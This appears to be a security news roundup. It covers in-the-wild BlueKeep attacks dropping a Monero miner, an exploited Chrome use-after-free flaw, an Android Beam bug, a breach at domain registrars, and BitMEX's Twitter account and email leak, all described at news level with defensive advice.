Windows BlueKeep RDP Attacks Begin
BlueKeep, a wormable remote code execution (RCE), is a vulnerability in the Remote Desktop Protocol (RDP) service throughout various Windows operating systems (XP, 2003, 7, Server 2008, and Windows Server 2008 R2). Exploiting this vulnerability allows an “unauthenticated attacker to run arbitrary code remotely, launch denial of service attacks, and, in some cases, take full control of unpatched systems.”
Currently, the RCE vulnerability is being exploited in the wild as security researcher Kevin Beaumont noticed multiple attacks in his EternalPot RDP honeypot. In the last week, his honeypots experienced cycles of crashes and reboots for the first time in the half-year they’ve been up.
Marcus Hutchins (AKA MalwareTech) investigated the crash dumps from Beaumont’s machines and “found BlueKeep artifacts in memory and shellcode to drop a Monero Miner.”
It looks like a #BlueKeep worm has finally arrived! Kevin kindly sent me a crash dump and after some investigation I found BlueKeep artifacts in memory and shellcode to drop a Monero Miner.
According to Hutchins’s analysis, the initial payload runs an encoded Powershell command, which downloads a second encoded Powershell script. The final payload includes a cryptocurrency miner, which has a 25 out of 68 detection rate on VirusTotal.
Thankfully, the individual behind these attacks seems to be using public resources and did not develop a wormable threat, which could cause significant security concerns for many.
Read more here
Google Discloses Wild Chrome Flaw
Over the weekend, Google disclosed a high-severity vulnerability that malicious actors are actively exploiting to hijack computers. Kaspersky security researchers Anton Ivanov and Alexey Kulaev discovered the flaw, CVE-2019-13720, which exists in Google Chrome’s audio element. The vulnerability allows an attacker to take control of an affected system.
CVE-2019-13720 is a “use-after-free flaw, which is a memory corruption flaw where an attempt is made to access memory after it has been freed.” The bug could cause a variety of issues, such as crashing the program, allowing an attacker to execute arbitrary code, or enabling full remote code execution capabilities.
In the wild, attackers have used this vulnerability to leverage a “waterhole-style injection” on a Korean news portal. The security engineers have called the exploits Operation WizardOpium and urge users to update to the latest version of Chrome, 78.0.3904.87.
Read more here
Android Bug Lets Hackers Plant Malware via NFC Beaming
Last month, Google patched an Android bug that could have allowed hackers to spread malware to phones near them using NFC beaming.
NFC beaming uses an internal Android OS service called Android Beam. This service is used to send various amounts of data, including videos, apps, files, and more to nearby devices using NFC waves. Typically, the receiving user receives a notification asking them to allow the NFC service to install the app or transfer data.
However, security researcher Y. Shafranovich discovered that when apps are sent via NFC Beaming on Android 8 (Oreo) or later versions, a notification alert is nonexistent on the receiving device. This vulnerability, CVE-2019-2114, could allow a nearby malicious actor to plant a malicious app on a victim’s phone. The vulnerability surfaces from the fact that Android Beam is whitelisted within the Android Operating system, so that whitelist access has now been removed.
To stay safe, you can disable both the NFC feature and Android Beam Service on your phone.
Get more information here
Leading Web Domain Name Registrars Disclose Data Breach
Many of the world’s top domain name registration websites such as Web.com, Network Solutions, and Register.com, recently disclosed a security breach that may have impacted customers’ account information.
In August 2019, a malicious actor gained unauthorized access to some of the companies’ computer systems and accessed millions of accounts owned by the web domain name registrars.
The breached information includes:
Information about the services offered to a customer
Because much of the stolen information includes personal identifying information, affected customers should be wary of potential targeted phishing emails. These emails attempt to steal a victim’s passwords or credit card information by impersonating a trusted entity.
Read more here
BitMEX Twitter ‘Hacked’ as Identities Are Leaked and Bitcoins Are Reportedly Stolen
Over the weekend, BitMEX seems to have experienced a strange series of events. Their official Twitter account appeared compromised as the official handle tweeted “Hacked” and “Take Your BTC and run. Last day for withdrawals.” Although, these tweets were quickly deleted.
In the past few days, the company also experienced a particularly embarrassing email blunder. Instead of sending a blind carbon copy while attempting to send a mass email to their customer base, BitMEX allowed for an entire email address list to be seen by whoever received the email.
While the leak does not share highly sensitive information, it does provide malicious actors with publicly identifiable information for more targeted phishing attacks. Some individuals have gone to Twitter, reporting their accounts have been accessed due to this mistake.
Read more here